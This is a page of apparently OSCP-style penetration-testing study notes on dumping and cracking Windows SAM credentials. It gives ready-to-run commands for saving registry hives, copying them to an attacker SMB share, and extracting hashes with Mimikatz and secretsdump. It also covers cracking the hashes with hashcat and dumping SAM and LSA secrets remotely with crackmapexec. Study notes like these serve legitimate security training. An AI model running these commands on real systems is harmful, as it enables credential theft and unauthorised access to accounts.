📚
Notes
  • Welcome
    • Intro
    • My OSCP Exam Adventure
  • Security Blogs
    • Initial Access 101
      • Spring Cloud Function CVE-2022-22963
    • Bug Hunting
      • XSS
        • Blog site search field
  • Active Directory
    • Tools
    • Common built-in AD groups
    • Identifying Users
    • LLMNR/NBT-NS Poisoning
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Making a Target User list
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
    • Credentialed Enumeration
      • Linux
      • Windows
      • Living Off the Land
    • Kerberoasting
      • Linux
      • Windows
    • ACL
      • Enumeration
      • Abusing ACLs
      • DCSync
    • Privileged Access
    • AS-REP Roasting
    • Attacking Trusts
      • Enumerating Trust Relationships
      • Child -> Parent Trusts
      • Cross-Forest Trust Abuse
  • Enumeration
    • SMB, RPC - 137,138,139,445,111
    • MYSQL - 3306
    • MSSQl - 1433
    • FTP - 21
    • RPC - 111
    • DNS - 53
    • NFS - 2049
    • SMTP - 25
    • IMAP, POP3 - 110,143,993,995
    • SNMP - 161
    • SVN - 3690
    • IRC - 8067
    • Oracle TNS - 1521
    • LDAP
    • Linux Remote Management Protocols
    • Windows Remote Management Protocols
    • Fuzzing
    • IPMI - 623(UDP)
  • Common Applications
    • Application Enumeration
    • CMS (Content Management System)
      • Wordpress
      • Joomla
      • Drupal
    • Servlet Containers/Software Development
      • Tomcat
      • Jenkins
    • Customer Service Mgmt & Configuration Management
      • Gitlab
  • Shells
    • Reverse Shells
    • Bind Shells
    • Spawning a TTY Shell
    • Web Shells
  • Privilege Escalation
    • Other Resources
    • Linux PrivEsc
    • Windows PrivEsc
      • Windows Users Privileges
      • Information Gatthering & Enumeration
      • Privilege Escalation Techniques
  • File Transfers
    • Quick Cheatsheet
    • Windows File Transfer
    • Linux File Transfer
  • Password Attacks
    • Linux Local Password Attacks
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
    • Windows Local Password Attacks
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
    • Pass-the-Hash (PtH)
    • Cracking Files
    • Remote Password Attacks
  • SIde Notes
    • Pivoting, Tunneling, and Port Forwarding
    • File Encryption
  • Programming
    • Downloading Files
Powered by GitBook
On this page
  • Copying SAM Registry Hives
  • Dumping SAM with Mimikatz
  • Using reg.exe save to Copy Registry Hives
  • Dumping Hashes with Impacket's secretsdump.py
  • Cracking Hashes with Hashcat
  • Remote Dumping & LSA Secrets Considerations
  • Dumping LSA Secrets Remotely
  • Dumping SAM Remotely
  1. Password Attacks
  2. Windows Local Password Attacks

Attacking SAM

Copying SAM Registry Hives

There are three registry hives that we can copy if we have local admin access on the target; each will have a specific purpose when we get to dumping and cracking the hashes. Here is a brief description of each in the table below:

Registry Hive
Description

hklm\sam

Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext.

hklm\system

Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database.

hklm\security

Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.

Dumping SAM with Mimikatz

lsadump::sam

Using reg.exe save to Copy Registry Hives

reg.exe save hklm\\sam C:\\sam.save

reg.exe save hklm\\system C:\\system.save

reg.exe save hklm\\security C:\\security.save

# Send the saved files to our system 
# start smbserver 
smbserver.py -smb2support share . 

# In Target Windows host
move sam.save \\\\ip\\share
move system.save \\\\ip\\share
move security.save \\\\ip\\share

Dumping Hashes with Impacket's secretsdump.py

# Dumping Hashes using transfered files
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Cracking Hashes with Hashcat

# Store nthashes to a .txt File
(uid:rid:lmhash:nthash) <-- last part is nthash

# Cracking nt hashes using hashcat
sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Remote Dumping & LSA Secrets Considerations

Dumping LSA Secrets Remotely

crackmapexec smb ip --local-auth -u eren -p pass --lsa

Dumping SAM Remotely

crackmapexec smb ip --local-auth -u eren -p pass --sam
PreviousWindows Local Password AttacksNextAttacking LSASS

Last updated 2 years ago